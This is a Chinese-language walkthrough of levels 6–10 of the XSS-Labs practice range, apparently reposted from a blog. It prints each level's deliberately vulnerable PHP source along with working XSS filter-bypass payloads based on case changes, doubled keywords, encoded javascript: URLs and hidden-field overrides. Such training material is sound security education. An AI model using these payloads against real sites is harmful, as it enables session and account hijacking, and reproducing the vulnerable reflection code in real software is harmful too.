热门标签
热门文章
- 1掌控数据流:深入解析 Java Stream 编程
- 2Nginx正向代理和反向代理_nginx配置正向代理
- 3毕业设计 免费送源码82552-springboot 在线心理咨询管理系统,【计算机毕业设计开题选题+程序定制+论文书写+答辩ppt书写-原创(题目+编号)的定制程序】
- 4【Vue3+Tres 三维开发】01-HelloWord_tresjs
- 5python中文相似度_最准的中文文本相似度计算工具
- 6数据治理系列:数仓建模之数仓主题与主题域_数仓主题域
- 7系统集成项目管理工程师(试题分析、考试大纲、教材目录)_系统集成项目管理师教材
- 8【Python学习】第一章——Python简介及环境搭建_python版本
- 9在Windows上直接使用JAVA API连接Hbase0.96报的一个异常
- 10spark streaming(文件流,套接字流,RDD队列流)_使用文件流作为数据源
当前位置: article > 正文
XSS-Labs靶场“6-10”关通关教程_xss闯关第十关
作者:weixin_40725706 | 2024-06-13 12:57:04
赞
踩
xss闯关第十关
点击跳转:
XSS-Labs靶场“1-5”关通关教程
一、第六关 大小写绕过
首先我们使用1双引号来进行闭合可以看到闭合了,下面我们使用1"<script>alert(1)</script>来观察回显:
这里我们可以看到肯定是加了过滤的,所以我们这里使用事件进行尝试:
1" οnclick="alert(1)
- 1
可以看到也对on进行了过滤,所以我们这里查看源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level7.php?keyword=move up!";
}
</script>
<title>欢迎来到level6</title>
</head>
<body>
<h1 align=center>欢迎来到level6</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level6.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
我们可以看到过滤了很多东西,但是我们很明显刚才第五关是使用了大小写转换的,但是第六关并没有,所以我们可以使用大小写进行绕过。
"Onclick="alert(1)
- 1
然后点击触发:
"><a Href="javascript:alert(1)">zy</a>//
- 1
点击即可完成触发:
当然,解法不止这两种,可以自己去尝试,这里不过多赘述。
二、第七关 双写绕过
这里我们就不做测试了,和第六关一样的测试过程,观察回显即可,我们直接看源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level8.php?keyword=nice try!";
}
</script>
<title>欢迎来到level7</title>
</head>
<body>
<h1 align=center>欢迎来到level7</h1>
<?php
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=搜索 />
</form>
</center>';
?>
<center><img src=level7.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str6)."</h3>";
?>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
这里我们可以看到它将一系列恶意字符串进行了置空:
所以本关我们直接采用双写来进行绕过:
"oonnclick="alert(1)
- 1
点击即可完成触发:
当然,我们也可以使用script:
"><scrscriptipt>alert(1)</scrscriptipt>//
- 1
三、第八关 URL编码绕过
这里我们使用伪协议:
javascript:alert(1)
- 1
来进行尝试,因为它是将其放入a标签中:
所以这里进行测试:
我们可以看到它将javascript进行了过滤,所以我们分析源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level9.php?keyword=not bad!";
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
可以看到它对双引号、src、data等等进行了过滤,同时进行了大小写转换,所以这里利用URL编码来完成:
javascript:alert(1)
javascript:alert(1)
- 1
- 2
点击即可完成触发:
四、第九关 http://判断
这里我们看见友情链接猜测和上一关基本相同,使用上一关payload进行尝试:
我们可以看到直接输出了链接不合法,下面我们查看源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level10.php?keyword=well done!";
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
}
else
{
echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
这里我们可以看到会出现链接不合法的原因便在于最后的if判断,如果我们输入的字符串中http://首次出现的位置即传入的值中是否有http://,所以我们可以创建以下payload:
javascript:alert()//http://
- 1
这里我们将http://放在最后面注释掉,从而完成注入:
点击即可完成触发:
当然,我们也可以将http://放入:
javascript:alert('http://')
- 1
点击即可完成触发:
五、第十关 隐藏参数绕过
首先我们依旧是进行测试:
"><script>alert</script>
- 1
这里我们会发现这里参数都是hidden状态,从表面上看貌似没有利用点,所以这里我们查看源码:
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()
{
confirm("完成的不错!");
window.location.href="level11.php?keyword=good job!";
}
</script>
<title>欢迎来到level10</title>
</head>
<body>
<h1 align=center>欢迎来到level10</h1>
<?php
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2 align=center>没有找到和".htmlspecialchars($str)."相关的结果.</h2>".'<center>
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
</center>';
?>
<center><img src=level10.png></center>
<?php
echo "<h3 align=center>payload的长度:".strlen($str)."</h3>";
?>
</body>
</html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
这里我们会发现首先是GET传参给t_sort,然后进行了尖括号的过滤,最后我们会发现有一个隐藏的传参方式,即为t_sort,所以我们需要将其类型进行改变,改为text:
?t_sort="οnclick=javascript:alert() type="text
- 1
点击即可完成触发:
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/712929
推荐阅读
相关标签
